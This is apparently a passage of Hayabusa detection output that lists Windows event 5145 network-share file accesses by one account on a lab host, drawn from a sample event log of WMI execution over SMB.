Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W5052cbb1#\960951a3fe97e1a2bd2d09ced71ce4f3 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.222 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W57798b05#\2145d62276d37b22799a8deb8d44b210 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W73044bb5#\fb97af1f4b1eed42372eea20ba746a53 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W193497eb#\a26561bad24a68eb0217aa9d9fdad386 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.W08054466#\50e266485611719e095733dd021e3a42 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.238 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad38fd8b#\44e2747436ee8621f4daf918b1922498 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wad78daf4#\748bf388335b4acc7031af4d134ad037 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb2d030b7#\7dbfc45fb55f5cf738956f4c7b2f8639 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wb9b5bb58#\789a3b275b1f5369ae5ab066e2461420 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.253 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wbc80354b#\fac59f632a5e8454549a214641d7bf25 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wc1cc6649#\996a8c9071e330fe0cfac06c4d9f2378 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wca5f1176#\f8b6726fa5f43478af33a92559c0cef2 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.269 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wcffedcb4#\f6be55d69bb92d49c71a4f9861c21451 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd75d181a#\1a3848fefabdd8a28f5cae97106da369 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wd518ee0d#\da3f8769af3163f94176c12ad223cb41 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We9f24001#\6a6b3af569c21f51ab2982968ae2775d : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.285 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.We0722664#\559ec1b9bc74181e3591df47bdb6b7ce : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wed3937f9#\4af7f054b14a220217737e71e6adff82 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\Microsoft.Wf493a5fb#\1a4e8e027cdf1271603e7eba2cd8fab0 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.300 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MIGUIControls\184c548bb9ea9e668823e3bedee4d86a : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCEx : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: 
Windows\assembly\NativeImages_v4.0.30319_32\MMCEx\85a6f67f65de23064f7deded08a464c5 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MMCFxCommon\52b6052b9447848191f40e69c88f0f8b : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\MSBuild\2965d6f0cc081ef81005efec548f72a9 : IP 
Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\c90ef9a73ea0044641d31b19023aad61 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.316 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napcrypt\2c945f157cd851b9dc43e99e9a89b34d : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\naphlpr\0ed1ed0e250773e63d7fe047dde76c81 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napinit\1264f8bd57934a4941865b3c0512803e : IP Address: 
10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\napsnap\5ab2511c5224a660e85286b3f2c2b752 : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57# : IP Address: 10.23.23.9,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1047-Windows Management Instrumentation/ID4688-5145-WMIexec execution via SMB.evtx +2021-04-22 20:32:30.332 +09:00,fs03vuln.offsec.lan,5145,informational,Network Share File Access,User: admmig : Share Name: \\*\C$ : Share Path: \??\C:\ : File: Windows\assembly\NativeImages_v4.0.30319_32\Presentatio1c968d57#\cc32e4d4e4dfbff56d3ae35134c1f38e : IP Address: 
